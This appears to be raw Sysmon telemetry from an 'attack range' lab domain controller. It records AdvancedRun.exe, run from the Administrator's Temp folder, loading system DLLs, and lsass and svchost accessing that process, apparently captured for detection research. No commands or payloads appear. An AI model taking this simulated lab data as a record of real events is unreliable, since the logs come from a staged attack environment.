18:40:06.099{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.036{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004007802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004007801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007789Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.021{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:06.005{834264DD-FE06-61EA-A605-000000002702}1660C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft 